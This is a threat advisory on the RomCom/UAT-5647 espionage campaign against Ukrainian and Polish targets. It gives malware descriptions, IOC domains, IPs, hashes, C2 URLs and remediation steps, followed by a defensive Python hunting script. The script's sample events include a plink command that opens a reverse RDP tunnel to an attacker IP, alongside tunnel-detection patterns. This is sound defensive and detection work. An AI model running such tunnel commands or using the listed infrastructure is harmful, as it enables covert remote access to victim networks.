October 18, 2024
Severity
High
Analysis Summary
Since at least late 2023, a new wave of cyberattacks against Ukrainian government agencies and unidentified Polish companies has been attributed to the Russian threat actor RomCom.
The intrusions use SingleCamper, also known as SnipBot or RomCom 5.0, a new variant of the RomCom RAT, according to researchers who track the activity cluster as UAT-5647. This variant is loaded directly from the registry into memory and communicates with its loader over a loopback address.
RomCom, also tracked as Storm-0978, Tropical Scorpius, UAC-0180, UNC2596, and Void Rabisu, has carried out multi-motivated operations since it emerged in 2022, including ransomware, extortion, and targeted credential harvesting. Its attacks have accelerated in recent months, with the aim of establishing long-term persistence on compromised networks and exfiltrating data, which points to a clear espionage motive.
The threat actor is reportedly expanding its infrastructure and toolkit rapidly, fielding malware components written in several languages: C++ (ShadyHammock), Rust (DustyHammock), Go (GLUEEGG), and Lua (DROPCLUE). Attack chains begin with a spear-phishing message that links to a downloader written in either Rust (RustyClaw) or C++ (MeltingClaw), which deploys the DustyHammock or ShadyHammock backdoor, respectively. A decoy document is displayed to the recipient to keep up the ruse.

DustyHammock is built to communicate with a command-and-control (C2) server, execute arbitrary commands, and download files from the server, whereas ShadyHammock acts both as a launchpad for SingleCamper and as a command listener. Because DustyHammock was still observed in attacks as recently as September 2024, ShadyHammock, despite its additional features, is believed to be a predecessor of DustyHammock.
SingleCamper, the latest iteration of the RomCom RAT, handles a range of post-compromise tasks: network reconnaissance, lateral movement, user and system discovery, data exfiltration, and downloading PuTTY's Plink tool to set up remote tunnels to adversary-controlled infrastructure.
This series of attacks against prominent Ukrainian organizations is likely meant to support UAT-5647's two-pronged strategy in phases: first, establish long-term access and exfiltrate data for as long as possible in support of espionage; second, pivot to deploying ransomware to disrupt the victim and potentially profit from the compromise. Keyboard-layout checks performed by the malware suggest that Polish entities were also targeted.
Impact
- Unauthorized Access
- Credential Theft
- Data Exfiltration
- Cyber Espionage
- Financial Loss
Indicators of Compromise
Domain Name
- dnsresolver.online
- apisolving.com
- rdcservice.org
- webtimeapi.com
- wirelesszone.top
- devhubs.dev
- pos-st.top
- adcreative.pictures
- creativeadb.com
- copdaemi.top
- adbefnts.dev
- store-images.org
IP
- 213.139.205.23
- 23.94.207.116
- 91.92.242.87
- 192.227.190.127
- 91.92.254.218
- 91.92.248.75
- 94.156.68.216
- 193.42.36.131
- 23.137.253.43
- 193.42.36.132
MD5
- d3d88205fe201c97dd5a75809611ec3c
- 060e1628cf48501dce75c375deeff744
- 32e46499f12fc005570840a2734c7ace
- 92989b176aa220ab5c4b5d44e9d4ded1
- 94d76f2c53c281d90a4eda885c8b6764
- 7d302fbe56cb05278c268af00cd52cc6
- 535f5801d80a62bad6ad74c2c08bbe48
- 171bc76d40e5471c5f79bf4b9c5012a8
- 7667193ac53c5bc150230ea254cf9b95
- fa93bb6c094d5e7995f6b0ec5dfaa1bf
- 86764b49d2a94f88c5aae7aebacc3428
- 299b060e4b23f76476617f183d041e05
- fa400cb70d13cb329d05877b8fe73ed5
- 17e3435ffb029fcc3e542940f1dd7119
- 498c620d80651de26da8f3b850f3045a
- 467c09f465cf061d144624f5b1d6a6ec
SHA-256
- 12bf973b503296da400fd6f9e3a4c688f14d56ce82ffcfa9edddd7e4b6b93ba9
- 260a6644ab63f392d090853ccd7c4d927aba3845ced473e13741152cdf274bbd
- 9062d0f5f788bec4b487faf5f9b4bb450557e178ba114324ef7056a22b3fbe8b
- 43a15c4ee10787997682b79a54ac49a90d26a126f5eeeb8569022850a2b96057
- aa09e9dca4994404a5f654be2a051c46f8799b0e987bcefef2b52412ac402105
- 585ed48d4c0289ce66db669393889482ec29236dc3d04827604cf778c79fda36
- 62f59766e62c7bd519621ba74f4d0ad122cca82179d022596b38bd76c7a430c4
- 9fd5dee828c69e190e46763b818b1a14f147d1469dc577a99b759403a9dadf04
- b1fe8fbbb0b6de0f1dcd4146d674a71c511488a9eb4538689294bd782df040df
- 7602e2c1ae27e1b36ee4aed357e505f14496f63db29fb4fcdd0d8a9db067a5c4
- f3fe04a7e8da68dc05acb7164b402ffc6675a478972cf624de84b3e2e4945b93
- 45adf6f32f9b3c398ee27f02427a55bb3df74687e378edcb7e23caf6a6f7bf2a
- b9677c50b20a1ed951962edcb593cce5f1ed9c742bc7bff827a6fc420202b045
- ce8b46370fd72d7684ad6ade16f868ac19f03b85e35317025511d6eeee288c64
- 9f635fa106dbe7181b4162266379703b3fdf53408e5b8faa6aeee08f1965d3a2
- 1fa96e7f3c26743295a6af7917837c98c1d6ac0da30a804fed820daace6f90b0
SHA-1
- 34a0b37f4358b5becd4d8b3b66d453f2be9e941b
- 06c0fb1bdbb75b1fa8b520b70598e2748d08de91
- d652276d998c1fea92e177b2cf803987d26d677c
- 51ac19c0a380f28af7998b341d9be81ea6da7770
- 35b51180a9921a532c00dcb58ee53925d95b53e4
- fc3f4abc4df69d18aaf67ba0be54bd44abd9520f
- d0f5a2032bbc924c662de349a0e9f0c181cba3ae
- 0ff9f3a1d8498b324ab43fabed5c376f680dd4b5
- 754f8e57c1defc44563f51c693ab372bff74ff84
- a1430282d845630cee4c36323091c496aa419619
- 9bc39326727481c9420c801a7eaacdcc3305c0ba
- 27b41a5b2efd92852363114d206c6554440813ad
- 0fa5bfed7dafbe248f436a6b6ca4b08e7e859fd4
- e417da9abdaa07b139ee07709c89dd7f499ad64a
- 6c4f4c1c21b855a5487ae9cdb30cbbe6a4038ba1
- 578f7c0d87c2237fe63ba6b275969913a2172fb6
URL
- http://apisolving.com:443/DKgitTDJfiP
- http://wirelesszone.top:433/OfjdDebdjas
- http://adcreative.pictures:443/kjLY1Ul8IMO
- http://creativeadb.com:443/n9JTcP62OvC
Remediation
- Block all threat indicators at your respective controls.
- Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
- Do not download documents attached to emails from unknown sources, and do not enable macros when the source is not trusted.
- Ensure that all systems, software, and applications are up-to-date with the latest security patches. Regularly check for and apply updates to eliminate known vulnerabilities that attackers could exploit.
- Educate employees about phishing emails, social engineering tactics, and safe online behavior. Effective training can reduce the likelihood of users inadvertently initiating an attack.
- Regularly back up critical data and systems to offline or isolated storage. Test the backup restoration process to ensure that it is effective in case of an attack.
- Deploy strong endpoint protection solutions that include advanced threat detection, behavior monitoring, and real-time protection against malware and ransomware.
- Employ robust email filtering and anti-phishing solutions to detect and prevent malicious attachments and links from reaching user inboxes.
- Conduct regular penetration testing and security assessments to identify vulnerabilities and weaknesses in your network and systems. Address any findings promptly.
- Thoroughly assess third-party vendors and software before integrating them into your environment. Ensure they have strong security practices and adhere to cybersecurity standards.
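The script below is an added example, not code from this advisory or from the researchers who track UAT-5647. It turns the indicator lists above into a hunting check that a practitioner can run over exported DNS, proxy or firewall lines, a file-hash inventory, and process-creation events, and it flags Plink invocations that open the SSH tunnels described in the analysis (the -R, -L and -D options). The domain and IP sets are copied from the IOC section; the hash set is a subset of the advisory's lists. The log formats, the sample events and the hostnames in them are constructed for the demonstration.

```python
"""Hunt for the UAT-5647 / RomCom indicators above in exported logs.
Added example, not the advisory's or the researchers' code. Indicator values are
copied from the IOC section (hash set is a subset); log lines are constructed."""
import re

IOC_DOMAINS = {
    "dnsresolver.online", "apisolving.com", "rdcservice.org", "webtimeapi.com",
    "wirelesszone.top", "devhubs.dev", "pos-st.top", "adcreative.pictures",
    "creativeadb.com", "copdaemi.top", "adbefnts.dev", "store-images.org",
}
IOC_IPS = {
    "213.139.205.23", "23.94.207.116", "91.92.242.87", "192.227.190.127",
    "91.92.254.218", "91.92.248.75", "94.156.68.216", "193.42.36.131",
    "23.137.253.43", "193.42.36.132",
}
IOC_HASHES = {  # subset of the MD5/SHA-1/SHA-256 lists; extend with the full lists
    "d3d88205fe201c97dd5a75809611ec3c",
    "34a0b37f4358b5becd4d8b3b66d453f2be9e941b",
    "12bf973b503296da400fd6f9e3a4c688f14d56ce82ffcfa9edddd7e4b6b93ba9",
}
# IPv4 address or DNS name; an optional :port is consumed but not captured.
HOST_RE = re.compile(r"\b((?:\d{1,3}\.){3}\d{1,3}|(?:[a-z0-9-]+\.)+[a-z]{2,})(?::\d+)?\b")
# Plink options that open a tunnel: -R (reverse), -L (local), -D (dynamic/SOCKS).
PLINK_TUNNEL_RE = re.compile(r"(?:^|\s)-([RLD])\s+(\S+)")


def network_matches(line):
    """Advisory domains/IPs in a DNS, proxy or firewall line. A name matches if it
    equals an IOC domain or is a subdomain of one; the port is ignored on purpose
    (the advisory's URLs use both :443 and :433), so match on the host, not the URL."""
    hits = set()
    for host in HOST_RE.findall(line.lower()):
        if host in IOC_IPS:
            hits.add(host)
            continue
        labels = host.split(".")
        for i in range(len(labels) - 1):
            parent = ".".join(labels[i:])
            if parent in IOC_DOMAINS:
                hits.add(parent)
                break
    return sorted(hits)


def hash_matches(hashes):
    """Case-insensitive lookup of file hashes against the IOC hash set."""
    return sorted({h.lower() for h in hashes if h.lower() in IOC_HASHES})


def plink_tunnel(cmdline):
    """Describe a Plink invocation that opens an SSH tunnel, else return None.
    A reverse (-R) tunnel to an advisory IP is the strongest signal. Only the
    command line is inspected; for renamed binaries also check the OriginalFileName
    field of Sysmon process-creation events."""
    if "plink" not in cmdline.lower():
        return None
    m = PLINK_TUNNEL_RE.search(cmdline)
    if not m:
        return None
    remote = None
    for tok in cmdline.split():
        if "@" in tok:  # user@host form of the SSH target
            remote = tok.rsplit("@", 1)[1].strip("\"'")
    return {"mode": m.group(1), "spec": m.group(2), "remote": remote,
            "remote_is_ioc": remote in IOC_IPS or remote in IOC_DOMAINS}


def hunt(events):
    """Run every check over (kind, payload) events; returns (category, indicator, payload)."""
    findings = []
    for kind, payload in events:
        if kind == "hash":
            findings += [("hash", h, payload) for h in hash_matches([payload])]
            continue
        findings += [("network", h, payload) for h in network_matches(payload)]
        if kind == "proc":
            t = plink_tunnel(payload)
            if t:
                findings.append(("plink-tunnel", f"{t['mode']} {t['spec']}", payload))
    return findings


SAMPLE_EVENTS = [  # constructed telemetry for the demonstration, not real data
    ("net", "2024-10-15T09:12:44Z dns A cdn.apisolving.com from 10.0.4.21"),
    ("net", "2024-10-15T09:12:45Z proxy CONNECT http://wirelesszone.top:433/OfjdDebdjas"),
    ("net", "2024-10-15T09:13:02Z fw allow 10.0.4.21 -> 91.92.254.218:443"),
    ("net", "2024-10-15T09:14:10Z dns A login.microsoftonline.com from 10.0.4.21"),
    ("hash", "D3D88205FE201C97DD5A75809611EC3C"),
    ("hash", "0123456789abcdef0123456789abcdef"),
    ("proc", r'Image=C:\Users\Public\plink.exe CommandLine="plink.exe -N -batch'
             r' -R 3390:127.0.0.1:3389 -pw x admin@91.92.254.218"'),
    ("proc", r'Image=C:\Program Files\PuTTY\plink.exe CommandLine="plink.exe -batch'
             r' jump.corp.example uptime"'),
]

if __name__ == "__main__":
    for category, indicator, payload in hunt(SAMPLE_EVENTS):
        print(f"[{category}] {indicator}  <-  {payload}")
```

Two design points matter in practice. Matching on the host rather than the full URL string catches the subdomain and port variations the actor uses (the advisory itself lists both :443 and :433 URLs), and matching hashes case-insensitively avoids missing hits from tools that export uppercase digests. The Plink check is behavioral: a reverse tunnel (-R) that terminates at an advisory IP is a strong indicator even when the binary has been renamed, so in a Sysmon-based environment pair the command-line check with the OriginalFileName field of the process-creation event.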